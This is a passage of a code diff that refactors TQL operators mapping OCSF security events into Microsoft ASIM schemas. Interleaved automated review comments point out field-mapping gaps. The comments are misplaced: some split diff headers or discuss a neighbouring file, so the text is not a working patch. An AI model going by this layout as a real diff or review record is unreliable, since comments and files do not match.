else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType +$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path? +$event.asim.ObjectType = "Event Log" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? -asim.TargetIpAddr = ocsf.dst_endpoint?.ip? +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? +$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index c271c3b..65209f3 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql 
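Review bot: `ActorUsername` falls back to `actor?.app_name?`/`actor?.app_uid?`, but `ActorUsernameType` is set only in the `domain\name` branch, so an event-log `Clear` attributed to an application is indistinguishable from one performed by an account that happens to be named like the app — and for log clearing, who did it is the whole question. Record the app separately, presumably `$event.asim.ActingAppName = $event.ocsf.actor?.app_name?` (confirm the field against the ASIM common schema), and set `ActorUsernameType = "Simple"` when a plain user name was used. As in the sibling operators, `match $event.ocsf.activity_name {` is unguarded while `Operation` uses `activity_name?`; OCSF event-log activities such as `Export`, `Archive` or `Rotate` land in `"Other"`, which is fine but worth a one-line comment.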
+++ b/microsoft/operators/asim/ocsf/file_system_activity.tql 
@@ -7,38 +7,38 @@ args: type: field --- -assert $event.class_uid == 1001 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 1001 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.file_event" -asim.EventSchema = "FileEvent" -asim.EventSchemaVersion = "0.2.2" -match ocsf.activity_name { - "Create" => { asim.EventType = "FileCreated" } - "Read" | "Open" => { asim.EventType = "FileAccessed" } - "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" } - "Delete" => { asim.EventType = "FileDeleted" } - "Rename" => { asim.EventType = "FileRenamed" } - _ => { asim.EventType = "FileCreatedOrModified" } +$event.asim.EventSchema = "FileEvent" +$event.asim.EventSchemaVersion = "0.2.2" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "FileCreated"} + "Read" | "Open" => { $event.asim.EventType = "FileAccessed"} + "Update" | "Set Attributes" | "Set Security" => { $event.asim.EventType = "FileModified"} + "Delete" => { $event.asim.EventType = "FileDeleted"} + "Rename" => { $event.asim.EventType = "FileRenamed"} + _ => { $event.asim.EventType = "FileCreatedOrModified"} } -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.TargetFilePath = ocsf.file?.path? else ocsf.file?.name? 
-asim.TargetFileName = ocsf.file?.name? else asim.TargetFilePath?.split("\\")[-1] -if ocsf.activity_name == "Rename" and ocsf.file_result? != null { - asim.SrcFilePath = asim.TargetFilePath - asim.SrcFileName = asim.TargetFileName - asim.SrcFilePathType = "Windows Local" if asim.SrcFilePath?.contains("\\") == true else "Unix Local" - asim.TargetFilePath = ocsf.file_result.path? else asim.TargetFilePath - asim.TargetFileName = ocsf.file_result.name? else asim.TargetFileName +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.TargetFilePath = $event.ocsf.file?.path? else $event.ocsf.file?.name? +$event.asim.TargetFileName = $event.ocsf.file?.name? else $event.asim.TargetFilePath?.split("\\")[-1] +if $event.ocsf.activity_name == "Rename" and $event.ocsf.file_result? != null { + $event.asim.SrcFilePath = $event.asim.TargetFilePath + $event.asim.SrcFileName = $event.asim.TargetFileName + $event.asim.SrcFilePathType = "Windows Local" if $event.asim.SrcFilePath?.contains("\\") == true else "Unix Local" + $event.asim.TargetFilePath = $event.ocsf.file_result.path? else $event.asim.TargetFilePath + $event.asim.TargetFileName = $event.ocsf.file_result.name? else $event.asim.TargetFileName } -asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" +$event.asim.TargetFilePathType = "Windows Local" if $event.asim.TargetFilePath?.contains("\\") == true else "Unix Local" -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 5213151..f1cf08d 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql 
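Review bot: `$event.asim.TargetFileName = $event.ocsf.file?.name? else $event.asim.TargetFilePath?.split("\\")[-1]` splits on backslashes only, so for a Unix path without `file.name` the entire path becomes the file name — even though the heuristic a few lines down (`"Windows Local" if ... contains("\\") ... else "Unix Local"`) already decides the path is Unix. Derive the separator from that same test and split on `"/"` when no backslash is present; `file.name` is usually populated, but when it is not, file-name-based detections (dropped binaries, renamed tools) silently miss. Unlike every other operator in this patch, `ActorUserIdType` is never set here although `ActorUserId` is; add `$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true` for consistency. Both path-type heuristics treat any backslash as Windows, which misclassifies Unix names containing a literal backslash — a comment flagging the heuristic would help.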
@@ -7,44 +7,44 @@ args:
 type: field
 ---
-assert $event.class_uid == 3006
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 3006
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.user_management"
-asim.EventSchema = "UserManagement"
-asim.EventSchemaVersion = "0.1.2"
-asim.EventSeverity = asim.EventSeverity? else "Informational"
-asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid?
-if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
- asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}"
- asim.ActorUsernameType = "Windows"
+$event.asim.EventSchema = "UserManagement"
+$event.asim.EventSchemaVersion = "0.1.2"
+$event.asim.EventSeverity = $event.asim.EventSeverity? else "Informational"
+$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid?
+if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null {
+ $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}"
+ $event.asim.ActorUsernameType = "Windows"
 }
-asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
+$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid?
+$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true
-match ocsf.activity_name {
- "Create" => { asim.EventType = "GroupCreated" }
- "Delete" => { asim.EventType = "GroupDeleted" }
- "Add User" => { asim.EventType = "UserAddedToGroup" }
- "Remove User" => { asim.EventType = "UserRemovedFromGroup" }
- "Read" => { asim.EventType = "GroupRead" }
- _ => { asim.EventType = "GroupModified" }
+match $event.ocsf.activity_name {
+ "Create" => { $event.asim.EventType = "GroupCreated"}
+ "Delete" => { $event.asim.EventType = "GroupDeleted"}
+ "Add User" => { $event.asim.EventType = "UserAddedToGroup"}
+ "Remove User" => { $event.asim.EventType = "UserRemovedFromGroup"}
+ "Read" => { $event.asim.EventType = "GroupRead"}
+ _ => { $event.asim.EventType = "GroupModified"}
 }
-asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid?
-if ocsf.user?.domain? != null and ocsf.user?.name? != null {
- asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}"
- asim.TargetUsernameType = "Windows"
+$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid?
+if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null {
+ $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}"
+ $event.asim.TargetUsernameType = "Windows"
 }
-asim.TargetUserId = ocsf.user?.uid?
-asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true
-asim.GroupName = ocsf.group?.name?
-asim.GroupId = ocsf.group?.uid?
-asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true
-asim.SrcIpAddr = ocsf.src_endpoint?.ip?
-asim.SrcHostname = ocsf.src_endpoint?.hostname?
+$event.asim.TargetUserId = $event.ocsf.user?.uid?
+$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true
+$event.asim.GroupName = $event.ocsf.group?.name?
+$event.asim.GroupId = $event.ocsf.group?.uid?
+$event.asim.GroupIdType = "SID" if $event.asim.GroupId?.starts_with("S-") == true
+$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip?
+$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname?
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql
index 8fa63bd..abe484e 100644
--- a/microsoft/operators/asim/ocsf/http_activity.tql
+++ b/microsoft/operators/asim/ocsf/http_activity.tql
@@ -7,21 +7,21 @@ args:
 type: field
 ---
-assert $event.class_uid == 4002
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 4002
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.web_session"
-asim.EventSchema = "WebSession"
-asim.EventSchemaVersion = "0.2.7"
-asim.EventType = "HTTPsession"
-asim.Url = ocsf.http_request?.url?.url_string?
-asim.HttpRequestMethod = ocsf.http_request?.http_method? else ocsf.activity_name?.to_upper()
-asim.EventResultDetails = ocsf.http_response?.code?.string() else ocsf.status_code?.string()
-if ocsf.http_response?.code? != null {
- asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure"
+$event.asim.EventSchema = "WebSession"
+$event.asim.EventSchemaVersion = "0.2.7"
+$event.asim.EventType = "HTTPsession"
+$event.asim.Url = $event.ocsf.http_request?.url?.url_string?
+$event.asim.HttpRequestMethod = $event.ocsf.http_request?.http_method? else $event.ocsf.activity_name?.to_upper()
+$event.asim.EventResultDetails = $event.ocsf.http_response?.code?.string() else $event.ocsf.status_code?.string()
+if $event.ocsf.http_response?.code? != null {
+ $event.asim.EventResult = "Success" if $event.ocsf.http_response.code < 400 else "Failure"
 }
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql
index 72f855a..e2d16bc 100644
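Review bot: The `ActorUsername` fallback chain ends in `app_name`/`app_uid`, so a service-principal or application actor is emitted as a username with no `ActorUsernameType`, and downstream rules cannot distinguish it from a human account; the same chain is used in scheduled_job_activity.tql and windows_service_activity.tql. ASIM has dedicated fields for this, so `$event.asim.ActingAppName = $event.ocsf.actor?.app_name?` and `$event.asim.ActingAppId = $event.ocsf.actor?.app_uid?` with `ActorUsername` left null when no user is present would keep the identity semantics intact. If the app fallback is intentional, a short comment on that line saying so would stop the next maintainer from "fixing" it.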
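Review bot: `EventResult` is set only when `http_response.code` is present, so a web-session record that carries just the base `status_code` gets `EventResultDetails` but no `EventResult`, and the base `status_id` is never consulted. A fallback on `status_id` (1 = Success, 2 = Failure in OCSF) placed before the `if` block would populate the field for proxy logs that only carry a status; whether the shared `common` operator already maps it cannot be seen from this hunk and should be checked first. The `activity_name?.to_upper()` fallback for `HttpRequestMethod` deserves a one-line comment, since it relies on OCSF HTTP activity names being the HTTP verbs.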
--- a/microsoft/operators/asim/ocsf/network_activity.tql
+++ b/microsoft/operators/asim/ocsf/network_activity.tql
@@ -7,36 +7,36 @@ args:
 type: field
 ---
-assert $event.class_uid == 4001
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 4001
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.network_session"
-asim.EventSchema = "NetworkSession"
-asim.EventSchemaVersion = "0.2.7"
-asim.EventType = "NetworkSession"
-asim.EventType = "Flow" if ocsf.activity_name == "Traffic" else asim.EventType
-asim.SrcIpAddr = ocsf.src_endpoint?.ip?
-asim.SrcHostname = ocsf.src_endpoint?.hostname?
-asim.SrcPortNumber = ocsf.src_endpoint?.port?
-asim.DstIpAddr = ocsf.dst_endpoint?.ip?
-asim.DstHostname = ocsf.dst_endpoint?.hostname?
-asim.DstPortNumber = ocsf.dst_endpoint?.port?
-asim.SrcBytes = ocsf.traffic?.bytes_out?
-asim.DstBytes = ocsf.traffic?.bytes_in?
-match ocsf.disposition? {
+$event.asim.EventSchema = "NetworkSession"
+$event.asim.EventSchemaVersion = "0.2.7"
+$event.asim.EventType = "NetworkSession"
+$event.asim.EventType = "Flow" if $event.ocsf.activity_name == "Traffic" else $event.asim.EventType
+$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip?
+$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname?
+$event.asim.SrcPortNumber = $event.ocsf.src_endpoint?.port?
+$event.asim.DstIpAddr = $event.ocsf.dst_endpoint?.ip?
+$event.asim.DstHostname = $event.ocsf.dst_endpoint?.hostname?
+$event.asim.DstPortNumber = $event.ocsf.dst_endpoint?.port?
+$event.asim.SrcBytes = $event.ocsf.traffic?.bytes_out?
+$event.asim.DstBytes = $event.ocsf.traffic?.bytes_in?
+match $event.ocsf.disposition? {
 "Allowed" => {
- asim.DvcAction = "Allow"
- asim.EventResult = "Success"
+ $event.asim.DvcAction = "Allow"
+ $event.asim.EventResult = "Success"
 }
 "Blocked" | "Denied" => {
- asim.DvcAction = "Deny"
- asim.EventResult = "Failure"
- asim.EventSeverity = asim.EventSeverity? else "Low"
+ $event.asim.DvcAction = "Deny"
+ $event.asim.EventResult = "Failure"
+ $event.asim.EventSeverity = $event.asim.EventSeverity? else "Low"
 }
 _ => {}
 }
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql
index bfb9786..08d77b4 100644
--- a/microsoft/operators/asim/ocsf/process_activity.tql
+++ b/microsoft/operators/asim/ocsf/process_activity.tql
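Review bot: The `match $event.ocsf.disposition?` recognises only "Allowed", "Blocked" and "Denied"; every other OCSF disposition (for example "Quarantined" or "Isolated") falls into `_ => {}` and leaves both `DvcAction` and `EventResult` unset, which NetworkSession queries read as "no enforcement known" rather than "blocked". Extending the second arm, `"Blocked" | "Denied" | "Quarantined" | "Isolated" => {`, covers the other blocking outcomes, and a comment on the `_ => {}` arm stating that the remaining dispositions are intentionally unmapped would make the coverage explicit. Note that `EventSeverity` is only defaulted on the deny path, so allowed flows carry whatever the shared `common` operator set, which is not visible here.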
@@ -7,32 +7,32 @@ args:
 type: field
 ---
-assert $event.class_uid == 1007
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 1007
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.process_event"
-asim.EventSchema = "ProcessEvent"
-asim.EventSchemaVersion = "0.1.4"
-match ocsf.activity_name {
- "Launch" => { asim.EventType = "ProcessCreated" }
- "Terminate" => { asim.EventType = "ProcessTerminated" }
+$event.asim.EventSchema = "ProcessEvent"
+$event.asim.EventSchemaVersion = "0.1.4"
+match $event.ocsf.activity_name {
+ "Launch" => { $event.asim.EventType = "ProcessCreated"}
+ "Terminate" => { $event.asim.EventType = "ProcessTerminated"}
 _ => {}
 }
-asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid?
-if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
- asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}"
- asim.ActorUsernameType = "Windows"
+$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid?
+if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null {
+ $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}"
+ $event.asim.ActorUsernameType = "Windows"
 }
-asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
-asim.ActingProcessId = ocsf.actor?.process?.pid?.string() else ocsf.process?.parent_process?.pid?.string() else ocsf.process?.pid?.string()
-asim.ParentProcessId = ocsf.actor?.process?.parent_process?.pid?.string()
-asim.TargetProcessId = ocsf.process?.pid?.string()
-asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else ocsf.process?.path?.split("\\")[-1]
-asim.TargetProcessCommandLine = ocsf.process?.cmd_line?
-asim.TargetUserId = ocsf.user?.uid?
+$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid?
+$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true
+$event.asim.ActingProcessId = $event.ocsf.actor?.process?.pid?.string() else $event.ocsf.process?.parent_process?.pid?.string() else $event.ocsf.process?.pid?.string()
+$event.asim.ParentProcessId = $event.ocsf.actor?.process?.parent_process?.pid?.string()
+$event.asim.TargetProcessId = $event.ocsf.process?.pid?.string()
+$event.asim.TargetProcessName = $event.ocsf.process?.name? else $event.ocsf.process?.file?.name? else $event.ocsf.process?.path?.split("\\")[-1]
+$event.asim.TargetProcessCommandLine = $event.ocsf.process?.cmd_line?
+$event.asim.TargetUserId = $event.ocsf.user?.uid?
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
index 4f93119..a0bcead 100644
--- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
+++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
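Review bot: The last fallback of `ActingProcessId`, `else $event.ocsf.process?.pid?.string()`, makes the acting process equal to the target process whenever neither `actor.process.pid` nor `process.parent_process.pid` is known, so `ActingProcessId == TargetProcessId` looks like a self-spawn to parent/child detection logic instead of missing data. Dropping that branch, `$event.asim.ActingProcessId = $event.ocsf.actor?.process?.pid?.string() else $event.ocsf.process?.parent_process?.pid?.string()`, leaves the field null, which is the honest value. `ActingProcessName`, `ActingProcessCommandLine` and `TargetUsername` are not mapped here although `actor.process` and `user` are read; whether the shared `common` operator fills them is not visible in this hunk.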
@@ -7,42 +7,42 @@ args:
 type: field
 ---
-assert $event.class_uid == 1006
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 1006
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.audit_event"
-asim.EventSchema = "AuditEvent"
-asim.EventSchemaVersion = "0.1.2"
-asim.EventType = "Other"
-match ocsf.activity_name {
- "Create" => { asim.EventType = "Create" }
- "Read" => { asim.EventType = "Read" }
- "Update" | "Set" => { asim.EventType = "Set" }
- "Delete" => { asim.EventType = "Delete" }
- "Execute" => { asim.EventType = "Execute" }
- "Install" => { asim.EventType = "Install" }
- "Clear" => { asim.EventType = "Clear" }
- "Enable" => { asim.EventType = "Enable" }
- "Disable" => { asim.EventType = "Disable" }
- "Start" => { asim.EventType = "Start" }
- "Stop" => { asim.EventType = "Stop" }
+$event.asim.EventSchema = "AuditEvent"
+$event.asim.EventSchemaVersion = "0.1.2"
+$event.asim.EventType = "Other"
+match $event.ocsf.activity_name {
+ "Create" => { $event.asim.EventType = "Create"}
+ "Read" => { $event.asim.EventType = "Read"}
+ "Update" | "Set" => { $event.asim.EventType = "Set"}
+ "Delete" => { $event.asim.EventType = "Delete"}
+ "Execute" => { $event.asim.EventType = "Execute"}
+ "Install" => { $event.asim.EventType = "Install"}
+ "Clear" => { $event.asim.EventType = "Clear"}
+ "Enable" => { $event.asim.EventType = "Enable"}
+ "Disable" => { $event.asim.EventType = "Disable"}
+ "Start" => { $event.asim.EventType = "Start"}
+ "Stop" => { $event.asim.EventType = "Stop"}
 _ => {}
 }
-asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType
-asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path?
-asim.ObjectType = "Scheduled Task"
-asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid?
-if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
- asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}"
- asim.ActorUsernameType = "Windows"
+$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType
+$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path?
+$event.asim.ObjectType = "Scheduled Task"
+$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid?
+if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null {
+ $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}"
+ $event.asim.ActorUsernameType = "Windows"
 }
-asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
-asim.SrcIpAddr = ocsf.src_endpoint?.ip?
-asim.TargetHostname = ocsf.dst_endpoint?.hostname?
-asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
+$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid?
+$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true
+$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip?
+$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname?
+$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip?
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql
index 333b731..5069b57 100644
--- a/microsoft/operators/asim/ocsf/windows_service_activity.tql
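Review bot: The body of this operator is identical to windows_service_activity.tql apart from the `class_uid` assertion and the `ObjectType` literal, including the `Object` fallback chain that reads both `job` and `win_service`, so the two files will drift the first time one of them gets a fix. Moving the shared AuditEvent mapping into a common operator parameterised by the object type, or at least a comment in each file pointing at its twin, would keep them aligned. The precedence in the `Object` chain (`job.name` before `log_name`/`metadata.log_name` before `entity` before `win_service`) is not obvious for a Scheduled Job Activity event and deserves a one-line comment stating why a log name outranks the entity.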
+++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql 
@@ -7,42 +7,42 @@ args:
 type: field
 ---
-assert $event.class_uid == 201004
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 201004
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.audit_event"
-asim.EventSchema = "AuditEvent"
-asim.EventSchemaVersion = "0.1.2"
-asim.EventType = "Other"
-match ocsf.activity_name {
- "Create" => { asim.EventType = "Create" }
- "Read" => { asim.EventType = "Read" }
- "Update" | "Set" => { asim.EventType = "Set" }
- "Delete" => { asim.EventType = "Delete" }
- "Execute" => { asim.EventType = "Execute" }
- "Install" => { asim.EventType = "Install" }
- "Clear" => { asim.EventType = "Clear" }
- "Enable" => { asim.EventType = "Enable" }
- "Disable" => { asim.EventType = "Disable" }
- "Start" => { asim.EventType = "Start" }
- "Stop" => { asim.EventType = "Stop" }
+$event.asim.EventSchema = "AuditEvent"
+$event.asim.EventSchemaVersion = "0.1.2"
+$event.asim.EventType = "Other"
+match $event.ocsf.activity_name {
+ "Create" => { $event.asim.EventType = "Create"}
+ "Read" => { $event.asim.EventType = "Read"}
+ "Update" | "Set" => { $event.asim.EventType = "Set"}
+ "Delete" => { $event.asim.EventType = "Delete"}
+ "Execute" => { $event.asim.EventType = "Execute"}
+ "Install" => { $event.asim.EventType = "Install"}
+ "Clear" => { $event.asim.EventType = "Clear"}
+ "Enable" => { $event.asim.EventType = "Enable"}
+ "Disable" => { $event.asim.EventType = "Disable"}
+ "Start" => { $event.asim.EventType = "Start"}
+ "Stop" => { $event.asim.EventType = "Stop"}
 _ => {}
 }
-asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType
-asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path?
-asim.ObjectType = "Service"
-asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid?
-if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
- asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}"
- asim.ActorUsernameType = "Windows"
+$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType
+$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path?
+$event.asim.ObjectType = "Service"
+$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid?
+if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null {
+ $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}"
+ $event.asim.ActorUsernameType = "Windows"
 }
-asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
-asim.SrcIpAddr = ocsf.src_endpoint?.ip?
-asim.TargetHostname = ocsf.dst_endpoint?.hostname?
-asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
+$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid?
+$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true
+$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip?
+$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname?
+$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip?
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/graph/ocsf/base.tql b/microsoft/operators/graph/ocsf/base.tql
index fa1d481..34e349b 100644
--- a/microsoft/operators/graph/ocsf/base.tql
+++ b/microsoft/operators/graph/ocsf/base.tql
@@ -1,12 +1,17 @@
 ---
 description: Microsoft Graph → OCSF Base Event (0)
+args:
+ named:
+ - name: event
+ description: The working event to map.
+ type: field
 ---
 @name = "ocsf.base_event"
-ocsf.category_uid = 0
-ocsf.class_uid = 0
-ocsf.activity_id = 0
-ocsf.type_uid = 0
-ocsf.severity_id = 0
-ocsf.time = now()
+$event.ocsf.category_uid = 0
+$event.ocsf.class_uid = 0
+$event.ocsf.activity_id = 0
+$event.ocsf.type_uid = 0
+$event.ocsf.severity_id = 0
